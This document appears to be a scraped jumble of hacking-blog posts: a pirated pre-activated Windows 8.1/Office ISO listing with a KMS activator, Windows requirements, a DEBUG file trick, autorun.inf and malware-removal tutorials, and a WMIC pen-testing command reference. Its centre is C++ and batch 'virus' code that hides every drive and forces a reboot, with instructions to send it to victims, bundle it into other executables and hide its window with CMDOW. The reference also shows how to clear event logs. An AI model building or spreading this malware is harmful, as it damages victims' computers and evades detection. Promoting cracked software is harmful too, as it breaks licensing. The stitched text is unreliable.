Windows 7 Sp1 Ultimate en-US (x86)

If you want to run Windows 7 on your PC, here's what it takes:

• 1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
• 1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
• 16 GB available hard disk space (32-bit) or 20 GB (64-bit)
• DirectX 9 graphics device with WDDM 1.0 or higher driver

Additional requirements to use certain features:

• Internet access (fees may apply)
• Depending on resolution, video playback may require additional memory and advanced graphics hardware
• Some games and programs might require a graphics card compatible with DirectX 10 or higher for optimal performance
• For some Windows Media Center functionality a TV tuner and additional hardware may be required
• Windows Touch and Tablet PCs require specific hardware
• HomeGroup requires a network and PCs running Windows 7
• DVD/CD authoring requires a compatible optical drive
• BitLocker requires Trusted Platform Module (TPM) 1.2
• BitLocker To Go requires a USB flash drive
• Windows XP Mode requires an additional 1 GB of RAM and an additional 15 GB of available hard disk space.
• Music and sound require audio output

Windows 8.1 Preactived V2 Office 2013 Pro Plus

Windows  8.1 Preactived V2 Office 2013 Pro Plus

No Windows 8.1 Settings were harmed in the making of this ISO
No Programs are added to Windows
No Registry Settings were modified
No Unattended Settings were added to the ISO


Installation Indexes:
Windows 8.1 (Core) x64 / KMS-Activated
Windows 8.1 (Core) N x64 / KMS-Activated
Windows 8.1 (Core) Single Language x64 / KMS-Activated
Windows 8.1 Pro x64 / KMS-Activated



Tools used:
imagex for /flags "ProfessionalWMC" setting and index renames
dism for set-edition for ProWMC, KB integration, install.esd export
oscdimg for ISO mastering with MS's default -u1 option
Info folder added to Windows Setup folder to annoy credit theives


Features:
Non-Activated and Pre-Activated indexes. Take your pick.*
*Uses custom AutoKMS_VL_ALL folder in Windows directory. You can
uninstall the daily task there if you wish to use a different
activator later. I've included the uninstall script
Highly Compressed install.esd recovery compression format
UEFI boot information added to ISO boot data

Windows 7 Sp1 Ultimate en-US (x64)

If you want to run Windows 7 on your PC, here's what it takes:

• 1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
• 1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
• 16 GB available hard disk space (32-bit) or 20 GB (64-bit)
• DirectX 9 graphics device with WDDM 1.0 or higher driver

Additional requirements to use certain features:

• Internet access (fees may apply)
• Depending on resolution, video playback may require additional memory and advanced graphics hardware
• Some games and programs might require a graphics card compatible with DirectX 10 or higher for optimal performance
• For some Windows Media Center functionality a TV tuner and additional hardware may be required
• Windows Touch and Tablet PCs require specific hardware
• HomeGroup requires a network and PCs running Windows 7
• DVD/CD authoring requires a compatible optical drive
• BitLocker requires Trusted Platform Module (TPM) 1.2
• BitLocker To Go requires a USB flash drive
• Windows XP Mode requires an additional 1 GB of RAM and an additional 15 GB of available hard disk space.
• Music and sound require audio output

Computeractive Issue (e-book)

Description

Computeractive Issue 432 - 2014 UK

76 Pages | True PDF | English | 16 MB

The objective of Computeractive is to provide 'Simple Clear Advice In Plain English' on all matters of technology. Computeractive writes about technology issues facing general readers in their day to day life. From buying advice on computers, mobile phones, cameras etc. to increasing productivity on Microsoft Windows to troubleshooting computers and laptops.

Downlaod     Computeractive Issue 432 - 2014 UK.pdf

How to create a Big size file ?

You can create a big size file using windows default command prompt itself. Why we need huge size file? When you create virus or you can use in your college for occupying the memory.

First of all Decide the Size of huge file. For eg, if you decide 1 milliion byte,then we should convert it to Hexadecimal format. Use the Windows Calculator in Scientific mode to convert to Hexadecimal.



we are planned to create 1 million byte sized file. So,Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the filesize reaches eight digits 000F4240.


* Now goto start->run
* Enter "cmd" to open the window.
* Enter the command DEBUG BIGFILE.DAT and ignore the File not found message.
* Type RCX and press Enter.
* Debug will display a colon prompt.
* Enter the last four digits of the hexadecimal number you calculated (4240, in our example).
* Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in          ourexample).
* Enter W for Write and Q for Quit.
* You've just created a 1-million-byte file using Debug.
* Of course you can create a file of any desired size using the same technique.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.



C++ Virus Code :


#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }



Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:


REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f



I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

How to hide the windows while running the virus code?

Good Morning Friends...!! This day will be great day! Because Break The Security get top rank inblogger directories.

Now i am going to introduce a new tool called as "CMDOW" . When you create and send virus to victim, the virus running process may be shown to victims. This tool will hide that also.



About Cmdow

Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:

http://www.commandline.co.uk/cmdow/

Hacking Autorun.inf virus attack|Is autorun.inf virus?

When i studied second year(cse), my friends told that autorun.inf is virus. I thought so. Because my antivirus blocks autorun.inf files. In third year when i search about autorun.inf file in net, i realize about the auto run file.

Today i bring some files from my college system. When i insert the pen drive in my system, there are lot of exe files.They are viruses. I delete all of them. Finally i opened the autorun.inf file in notepad and saw the instructions. Then only i remembered that i forget to post about autorun file. This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:




[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe




is autorun.inf virus file? no. Then why antivirus block the autorun.inf files? Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted. Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:

[Autorun]

save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside the autorun.inf file is :

[Autorun]

This will be used to identify the the file as autorun.

OPEN=
This will specify which application should be opened when the cd or pen drive is opened

Example:

open=virus.exe

This will launch the virus.exe file when cd or pen drive is opened. The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.

Open=RECYCLER\Virus.exe

Explore=
Nothing big difference. if you right click and select explore option in cd or pen drive. This command will be run.

AutoPlay=
Same as the above , but it will launch the the program when auto played.


SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:


shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe





Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Change the icon of your pen drive or cd. you can use .ico,.bmp images(also .exe,.dll)

Example:

icon=breakthesecurity.ico

Label=

Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking



Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus. But why antivirus blocks it? Because as i told autorun file call or launch any application or exe files. It will lead to virus attack. If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

HOW TO DELETE VIRUS MANUALLY WITHOUT USING ANY ANTI-VIRUS PROGRAMS

This tutorial will teach you how to delete virus manually without using any anti-virus programs in your computer. The tutorial is just basic but effective and it's easy to learn. The following steps are just a summary of the video related to Clint's blog post.


Note: To be able to delete any of your file, make sure it was not use by other programs of processes.


Begin Step 1. Let's use Task Manager.
Since virus and other infectious files are running it's process within your computer system, you are unable to delete the virus unless you kill or end the process that using the virus or keep it running. In this section, we will have to use the task manager in your computer systems in order to kill a process.
Press Ctrl + Alt + Del in your keyboard to access your task manager. In case you can't access your task manager it's either you are already infected by virus or other related files. You can download FREE extended task manager to replace your infected task manager, click here to download.

Now, if you already have the task manager, open it and go toprocess tab. This time, it's a little bit harder to determine which one of the process that is a virus or keep the virus running on your computer. You have to make a little research here. But here is a few tips for you to determine the virus. You have a files like this. csrss.exe, svchost.exe, smss.exe, Lsass.exe, most virus copy their names with that file names but got little bit difference in spelling. Review that files and if you found files like this: svcchost.exe, ssmss.exe, cssrss.exe, look at the spelling...that's a virus.
Another TIP. Open your command prompt. Go to Start>Run and type cmd.

A Command Prompt window will open. Now, type on the current location in your cmd this command: cd.. hit ENTER and another cd..hit ENTER.
Refer to the image below.

On your current DRIVE: type, dir /ah and hit ENTER. All directories and files with hidden attribute in your current drive will display.
Refer to the image below.

Now, look for autorun.inf file on the displayed items. If you found an autorun.inf file open it using notepad. Close now your cmd.

Here's how to open autorun.inf file using notepad.
Go to Run, type: notepad c:\autorun.inf and hit ENTER.

Note: we are currently in drive C. in case you have different drive letters, please change the C to your own drive letter.


An autorun.inf should open in notepad like this:

You have notice the OPEN command inside the autorun.inf. Now, after the open command there is a name "virusname.exe" which will be the name of the virus or worms. Go back now to your task manager and look for that name, select it and then END TASK. You have now end the virus process. You are now done with our first step.


Proceed to Step 2. Let's again use the Command Prompt.

Open command prompt from Start>Run and type cmd. Or go to All Programs>Accessories>Command Prompt.

In command prompt window. as we have done on the first step using command prompt, use again the cd.. command twice to go to our drive c. (note again: your drive maybe different with mine.)




Now, type dir /ah. Remember the name of the virus as on step 1? Then now, delete the virus using the del command. But first, remember that virus are hidden files, which means we should change it's attributes using attrib command.
Type attrib -s -h virusname.exe /s /f . Refer to the image below:

After changing the attribute, you can now freely delete the virus.
Type del "virusname.exe" /f. Refer to the image below:

Now, you should have deleted the virus. Next step is to navigate to your Windows folder and system32 folder. To navigate to windows folder. Use the command cd "windows" and then
do the same job again. First look for virus name, change the attribute and delete. After doing it, navigate to system32 then do the same job again. Next is to navigate to the other drives, example your D, E, F, or removable drives and do the same job. That's it.............


To know more on how to use the command prompt commands, just type the command name followed by /?
i.e. cd /?


Step 3. Let's restore the altered system files which cause by virus or worms. One or more of this important file are altered within your system after you get infected:


Command Prompt or cmd
Registry Editor or regedit.exe
Run command
Task Manager
Folder Options

Windows Hackers Command Reference

Windows Command Reference for Pen-testers

This part of the blog is dedicated to Windows commands that can be used from Penetration Testers (yea who is your tester?) and Information Security Administrators. In this page I will periodically post Windows tiny simple scripts and commands that a Penetration tester or a Security Administrator can use to:

1. Perform Administration Security tasks (e.g do patch enforcement, silently uninstall software e.t.c).

2. Run Vulnerability Scans (e.g Identify null sessions, test for LANMAN services e.t.c).

3. Do pivoting (e.g after compromising a machine use windows tools to escalate e.t.c).



Test for installed patches 

In order to run WMIC you just open up a command prompt and type wmic and you imminently get an interactive command shell with root accesses.

Identifying the windows security patches using WMIC
wmic qfe get description,installedOn

Note: This produces a long list of Windows Patches and when they were installed and exports the results in stdout. That way you know exactly how to attack the workstation or perform remediation to a workstation.


Identifying windows services 

1.  sc query type= service (running services) 
2. sc query type= service state= inactive (exist but don't run)
3. sc query type= service state= all (running and not running)


Identifying windows startup programs

This commands are reporting the start up programs: 

1. wmic startup
2. wmic startup list full
3. wmic startup list brief
4. wmic startup list system


Note: This commands produces a list with all start up programs along with their registry keys, a program description and program name. The options shown above give you various output. Very interesting when doing malware behavioral analysis. 

1. wmic /node:machinename startup list full
2. wmic STARTUP GET Caption, Command, User

Note: Remotely list startup apps


Identifying windows network cards 

WMIC can also give you lots of information about the network cards and drivers: 

1. wmic nicconfig list
Note: That will give you a list of all network drivers 

1. wmic nicconfig where IPEnabled='true'

Note: That will give you a list of IP interfaces. 

1. wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")

Note: This will update static IP address 

1. wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)

Note: This will Change network gateway 

1. wmic nicconfig where index=9 call enabledhcp

Note: This will enable DHCP. 

1. wmic service where caption="DHCP Client" call changestartmode "Disabled"
2. wmic service where caption="DHCP Client" call changestartmode "Automatic"
3. wmic service where caption="DHCP Client" call changestartmode "Manual"
Note: This will enable DHCP make disable, automatic or manual the service. 

1. wmic /node:machinename nicconfig where Index=1 call EnableDHCP

Note: Remotely change IP to use DHCP 

1. wmic /node:machinename nicconfig where Index=1 call EnableStatic ("172.16.10.10"), ("255.255.0.0")

Note: Remotely change the IP to a static IP (Index is Interface#)

Handle Windows Process life-cycle 

The above sets of commands lets you handle all type of process manipulation: 

1. wmic process
2. wmic process list brief
3. wmic process list full
4. wmic process list system

Note: The above commands list processes in a windows machine. 

1. wmic /record:processes.xml process list brief
2. wmic /record:processes.xml process list full
3. wmic /record:processes.xml process list system

Note: After the command runs, your results are stored in xml format. That's the only format supported, but this is a handy record of what you typed, when you typed it, and the results you got. 

1. wmic process where name='process_name.exe'
2. wmic process where name='process_name.exe' list brief
3. wmic process where name='process_name.exe' list full
4. wmic process where name='process_name.exe' list system
5. wmic process where name='process_name.exe' delete

Note:The above let you commands search/kill and create processes based on their name. 

1. wmic process | more


Note: Displays all processes per screen page 

1. wmic process | findstr "process name"

Note: The above command searches a process name, or process information per line.

1. wmic /output:wmic.html process list full /format:hform

Note: List running processes and output to HTML/XSL form. 

1. wmic /node:machinename process list brief /every:1

Note: Remotely list running processes every second 

1. wmic process where name="cmd.exe" call getowner
2. wmic process where name="cmd.exe" call getownersid

Note: Get Process Owner or OwnerSID.You can use that to migrate using metasploit to some useful process.


ICMP and DNS network sweeping 

After taking over a windows box you can use it as a pivot, but what happens if it is a restricted box and you cannot download or upload any tools? Well the following commands will do the job: 

for /L %I in (1,1,254) DO @ping -n 1 192.168.1.%I | findstr "TTL=128" >> pinglog.txt

Note: This command sequence will ping sending only one package and report this machine that have a none zero TTL field. The output of the loop will be stored in a file named pinglog.txt. 

for /L %I in (1,1,254) DO @nslookup 192.168.1.%I | find "Name:" >> dnslog.txt
Note: This command sequence will perform a reverse DNS lookup using the local DNS server (an external dns server can be sued also). The output will be stored in a log file called dnslog.txt
pathping targethost (for a single host only) 

for /L %I in (1,1,254) DO @pingpath -n 192.168.1.%I >> traceping.txt

Note: This command combines functions of Ping and Tracert. Pathping will first list the number of hops required to reach the address you are testing and then send multiple pings to each router between you and the destination. After that, it computes results based on the packets returned from each router. Because pathping displays the degree of packet loss at any given router or link, you can determine which routers or subnets might be having network problems. Note that the whole process may consume 5-10 minutes because many pings are being sent. There are switches to modify the process and these can be seen by entering "pathping /?" in the command prompt.The command sequence above will map the whole network along with their routes (this is going to be verbose).

for /L %I in (1,1,254) DO @echo -Route: %I- >> trace.txt & @pathping -n 1 192.168.1.%I >> trace.txt 

Note: This will do a simple trace routing of the whole local network.

Windows network connection monitoring 

1. netstat -nab 3 >> netstat.txt

Note: This will perform an infinite loop with all listening ports and the executable engaged with a refresh rate of 3 seconds. More specifically:

1. Option: -n

Displays addresses and port numbers in numerical form 

1. Option: -a

Displays all connections and listening ports

1. Option: -b

Displays the executable involved in creating each connection or listening port. In some cases well-known executables host multiple independent components, and in these cases the sequence of components involved in creating the connection or listening port is displayed. In this case the executable name is in [] at the bottom, on top is the component it called, and so forth until TCP/IP was reached. Note that this option can be time-consuming and will fail unless you have sufficient permissions.

Important 

Note: This tool is very good for identifying malware behavior that does not alter any system functions, because in case you try to disinfect a rootkit it will not be much of a help :).

Handling Windows Users

The following examples displays a list of all user accounts for the local computer (some commands do that along with other useful information): 

1. net user
2. wmic useraccount
3. wmic useraccount list brief
The following example displays information about the user account someuser:

1. net user someuser

The following example adds a user account for a user whose full name is Jay Jamison and whose user account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B), and the user's full name:

1. net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay Jamison

or

1. Simple add user: net user someuser /add

2. net user miked /time:M-F,08:00-17:00

Note: Sets the logon time (8 A.M. to 5 P.M.) for miked by using 24-hour notation:

1. net user miked /time:M-F,8AM-5PM

Note: Sets the logon time (8 A.M. to 5 P.M.) for miked by using 12-hour notation:

1. net user anibals /time:M,4AM-5PM;T,1PM-3PM;W-F,8:00-17:00

Note: Specifies logon hours of 4 A.M. until 5 P.M. on Monday, 1 P.M. until 3 P.M. on Tuesday, and 8 A.M. until 5 P.M. Wednesday through Friday for anibals:

1. wmic /node:remotecomputer computersystem get username 

Note: Determine user currently logged in remotely.

List Event Logs  

1. wmic ntevent list brief --- Brief takes a while, full takes even longer
2. wmic nteventlog where (description like "%secevent%") call clearevent

List Services  

1. wmic service list brief
2. Delete ARPCache
3. netsh int ip delete arpcache
Auditing the security policies

Applies To: Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Vista Displays information about and performs functions to manipulate audit policies.For examples of how this command can be used, see the Examples section in each topic.
Auditpol /get /user:{S-1-5-21-1443922412-3030960370-963420232-51} /category:"System","Detailed Tracking","Object Access"

Reboot or Shutdown a box

1. wmic os where buildnumber="2600" call reboot -- Get build# from OS Info (see below)
2. shutdown -r -f -t 2
3. shutdown -s -f -t 4

Reference:
http://technet.microsoft.com
http://isc.sanc.edu
http://commandwindows.com
http://technet.microsoft.com/
http://theinterw3bs.com